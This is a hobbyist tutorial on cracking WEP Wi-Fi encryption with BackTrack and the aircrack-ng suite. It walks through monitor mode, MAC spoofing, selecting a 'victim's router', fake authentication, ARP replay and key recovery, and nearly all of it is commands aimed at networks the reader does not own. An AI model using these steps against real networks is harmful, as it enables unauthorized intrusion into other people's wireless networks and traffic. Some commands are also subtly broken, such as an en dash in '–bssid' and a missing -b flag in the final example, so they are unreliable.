Hacking WEP – II

No more toys, you're way too deep now..

([For this tutorial you need external WiFi adapter] OR [have BackTrack installed in your Hard Drive, not a virtual machine])
(Otherwise, look for the method using normal windows OS in the intermediate section)

Open up BackTrack, Login and then follow the below steps

1. Open konsole and type the following to start up network connections.
»/etc/init.d/networking start

2. Now we are going to put the network card into moniter mode by typing the following.
»airmon-ng
(You will find your Interface here)

3. So first start up the scan
»airmon-ng start wlan0
or
»airmon-ng start wlan1
(this command depends on what it reads on your router or networking card as, replace as needed)

4. Lets spoof your MAC address first by typing this next command.

»ifconfig wlan1 down
»macchanger -r wlan1
»ifconfig wlan1 up

This will change the MAC address being used to the computer we are connecting to.

5. Time to start finding our victim’s router, type the following in konsole.
»airodump-ng mon0

This will show the entire list of all the WiFi connections your adapter can catch and once you find one that suits your interest, and continue:

6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole: (Read slowly!)

»airodump-ng -c [channel number] –bssid [the BSSID of the router] -w [new name for the cap file] mon0 (the interface we are using)

For Example: »airodump-ng -c 1 –bssid 11:22:33:44:55:66 -w Newcapfile mon0

(*IMPORTANT- You have to fill in everything between [ ] yourself, since it is different for every case. You will get the BSSID, channel number from the previois steps, ‘mon0′ or ‘mon1′ based on your adapter, and for name of cap file you can type in any file name like ‘MyCapFile’)

7. Lets start the passphrapse cracking. We need to get around 30,000-50,000 IVs(packets). We start by sending fake authentication requests. To do this open a new konsole and type:

»aireplay-ng -1 1 -a [The BSSID of the router] mon0

example: »aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0

8. Almost done, we just need to contune the capturing process, open another konsole and type:

»aireplay-ng -3 -b [The BSSID of the router] mon0
Now it will start replaying ARPs. (ARP = Address Resolution protocol, it is needed to find the device address from the IP address)

Collect a good amount of IVs like around 30,000-50,000(the more the better).(Depending on the network strength, this step can take anywhere from 15 minutes to about 3 hours). It should be stored in the .cap file Once you’ve captured enough packets, type CTRL + C to stop the process and continue to step 9.

9. Time to start cracking that cap file  You can think of it like every single packet contains a bit of leaked password. So we’ve captured a large number of packets, compiled them in the .cap file and now we’re going to try and find out tiny bits of information from each packet and piece it together to give us the PassPhrase. Open a new konsole and type:

»aircrack-ng -b [bssid] [file name]-01.cap

example: »aircrack-ng 11:22:33:44:55:66 wepcap-01.cap

10. Wait a few seconds and we should now be presented with the key to log in to the router.

Key Commands.
►nwlan0 = Interface (Examples: wlan0, ath0, eth0)
►nch = The channel the target is on (Examples: 6, 11 You can find out using your wifi adapter’s interface)
►nbssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
►nssid = Name of target (Examples: linksys, default)
►filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
►fragment-*.xor= The * being replaced by a number
►(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)